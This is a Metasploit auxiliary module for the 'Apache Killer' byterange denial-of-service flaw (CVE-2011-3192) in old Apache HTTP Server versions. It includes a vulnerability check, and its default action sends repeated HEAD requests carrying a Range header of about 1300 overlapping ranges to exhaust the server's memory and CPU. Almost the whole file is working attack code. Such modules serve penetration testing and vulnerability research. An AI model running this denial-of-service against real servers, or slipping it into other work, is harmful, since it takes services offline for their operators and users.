##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache Range Header DoS (Apache Killer)',
        'Description' => %q{
          The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x
          through 2.2.19 allows remote attackers to cause a denial of service (memory and
          CPU consumption) via a Range header that expresses multiple overlapping ranges,
          exploit called "Apache Killer".
        },
        'Author' => [
          'Kingcope', # original discovery
          'Masashi Fujiwara', # metasploit module
          'Markus Neis <markus.neis[at]gmail.com>' # check for vulnerability
        ],
        'License' => MSF_LICENSE,
        'Actions' => [
          ['DOS', { 'Description' => 'Trigger Denial of Service against target' }],
          ['CHECK', { 'Description' => 'Check if target is vulnerable' }]
        ],
        'DefaultAction' => 'DOS',
        'References' => [
          [ 'BID', '49303'],
          [ 'CVE', '2011-3192'],
          [ 'EDB', '17696'],
          [ 'OSVDB', '74721' ],
        ],
        'DisclosureDate' => '2011-08-19',
        'Notes' => {
          'AKA' => ['Apache Killer'],
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('URI', [ true, 'The request URI', '/']),
        OptInt.new('RLIMIT', [ true, 'Number of requests to send', 50])
      ]
    )
  end

  def run_host(_ip)
    case action.name
    when 'DOS'
      conduct_dos

    when 'CHECK'
      check_for_dos
    end
  end

  def check_for_dos
    uri = datastore['URI']
    rhost = datastore['RHOST']
    res = send_request_cgi({
      'uri' => uri,
      'method' => 'HEAD',
      'headers' => {
        'HOST' => rhost,
        'Range' => 'bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10',
        'Request-Range' => 'bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10'
      }
    })

    if res && res.code == 206
      print_status("Response was #{res.code}")
      print_status("Found Byte-Range Header DOS at #{uri}")

      report_note(
        :host => rhost,
        :port => rport,
        :type => 'apache.killer',
        :data => { :uri => uri }
      )

    else
      print_status("#{rhost} doesn't seem to be vulnerable at #{uri}")
    end
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE => e
    vprint_error(e.message)
  end

  def conduct_dos
    uri = datastore['URI']
    rhost = datastore['RHOST']
    ranges = ''

    for i in (0..1299) do
      ranges += ',5-' + i.to_s
    end

    for x in 1..datastore['RLIMIT']
      begin
        print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")
        _res = send_request_cgi(
          {
            'uri' => uri,
            'method' => 'HEAD',
            'headers' => {
              'HOST' => rhost,
              'Range' => "bytes=0-#{ranges}",
              'Request-Range' => "bytes=0-#{ranges}"
            }
          },
          1
        )
      rescue ::Rex::ConnectionRefused
        print_error("Unable to connect to #{rhost}:#{rport}")
      rescue ::Errno::ECONNRESET
        print_good("DoS packet successful. #{rhost} not responding.")
      rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
        print_error("Couldn't connect to #{rhost}:#{rport}")
      rescue ::Timeout::Error, ::Errno::EPIPE => e
        vprint_error(e.message)
      end
    end
  end
end